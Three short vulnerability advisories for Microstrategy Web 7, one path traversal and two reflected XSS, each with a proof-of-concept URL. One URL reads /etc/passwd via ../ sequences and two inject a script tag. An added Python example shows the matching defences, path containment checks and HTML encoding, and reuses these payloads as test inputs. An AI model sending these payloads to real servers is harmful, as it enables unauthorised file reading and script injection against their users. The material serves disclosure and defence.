<!--
# Exploit Title: Path traversal vulnerability in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: all
# CVE : CVE-2018-18777
# Category: webapps

1. Description

Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application.

2. Proof of Concept

http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd

3. Solution:

The product is discontinued. Update to the latest version of this product.

Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->

<!--
# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: Unix
# CVE : CVE-2018-18775
# Category: webapps

1. Description

Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter.

2. Proof of Concept

http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg= "><script>alert("XSS");</script><"

3. Solution:

The product is discontinued. Update to the latest version of this product.

Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->

<!--
# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: all
# CVE : CVE-2018-18776
# Category: webapps

1. Description

Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the admin.asp ShowAll parameter.

2. Proof of Concept

http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll= "><script>alert("XSS")</script><"&ShowAllServers=show

3. Solution:

The product is discontinued. Update to the latest version of this product.

Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
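The three advisories describe two input-handling failures: a file-path parameter (subpage) that is joined onto a base directory without a containment check, and text parameters (Msg, ShowAll) that are reflected into HTML without output encoding. The following Python is an added illustration of the corresponding defences and is not code from the advisories or from Microstrategy; the function names, the base directory /srv/webmstr7/pages, the assumed attribute context for Msg, and the sample inputs are all constructed for this example. The path check canonicalises first and then tests containment, so it rejects the advisory's /.. sequence and its variants without relying on a substring filter, and the encoder applies the OWASP rule the advisories' "Patch" link points to.

```python
"""Defensive handling for the two input classes in the advisories above.

Added example, not Microstrategy code. Names, paths and sample inputs are
assumptions constructed for the illustration.
"""
import html
from pathlib import Path


class TraversalRejected(ValueError):
    """Raised when a requested path would escape the allowed base directory."""


def resolve_subpage(base_dir: str, subpage: str) -> Path:
    """Map a user-supplied 'subpage' onto a file strictly inside base_dir.

    Both sides are canonicalised (.. components, redundant separators and
    symlinks resolved) and then compared for containment. Absolute requests
    are refused before the join, because Path(base) / '/etc/x' would discard
    base entirely.
    """
    base = Path(base_dir).resolve()
    if Path(subpage).is_absolute():
        raise TraversalRejected(f"absolute path not allowed: {subpage!r}")
    candidate = (base / subpage).resolve()
    # Containment is decided on the canonical path, not by searching for '..':
    # a '..' that stays inside base is legitimate, one that leaves it is not.
    if candidate != base and base not in candidate.parents:
        raise TraversalRejected(f"path escapes base directory: {subpage!r}")
    return candidate


def encode_for_html(value: str) -> str:
    """Encode a value before placing it in HTML text or a quoted attribute.

    html.escape(quote=True) rewrites & < > " and ' as entities, which closes
    the attribute-breakout shape shown in the Login.asp / admin.asp PoCs.
    """
    return html.escape(value, quote=True)


def render_login_message(msg: str) -> str:
    """Emit the fragment a login page might use for Msg (assumed markup)."""
    return f'<input type="text" name="Msg" value="{encode_for_html(msg)}">'


# Constructed sample inputs: one legitimate request, then the shapes of the
# advisory's PoC and its common variants, plus a '..' that stays in bounds.
SAMPLE_BASE = "/srv/webmstr7/pages"
SAMPLE_SUBPAGES = [
    "reports/index.html",
    "../../../../../../../../etc/passwd",
    "/etc/passwd",
    "reports/../../secrets.txt",
    "reports/../index.html",
]


def check_subpages(base_dir: str = SAMPLE_BASE, subpages=SAMPLE_SUBPAGES) -> dict:
    """Return {subpage: resolved path as str, or 'REJECTED'} for each sample."""
    results = {}
    for sp in subpages:
        try:
            results[sp] = str(resolve_subpage(base_dir, sp))
        except TraversalRejected:
            results[sp] = "REJECTED"
    return results


if __name__ == "__main__":
    for sp, outcome in check_subpages().items():
        print(f"{sp!r:45} -> {outcome}")
    print(render_login_message('"><script>alert("XSS");</script><"'))
```

Note that "reports/../index.html" is accepted: the canonical result still lies under the base directory, which is why the decision is made on the resolved path rather than on the presence of "..". The encoder handles the text and quoted-attribute contexts; a value placed inside a script block or a URL would need the context-specific rule from the cheat sheet instead.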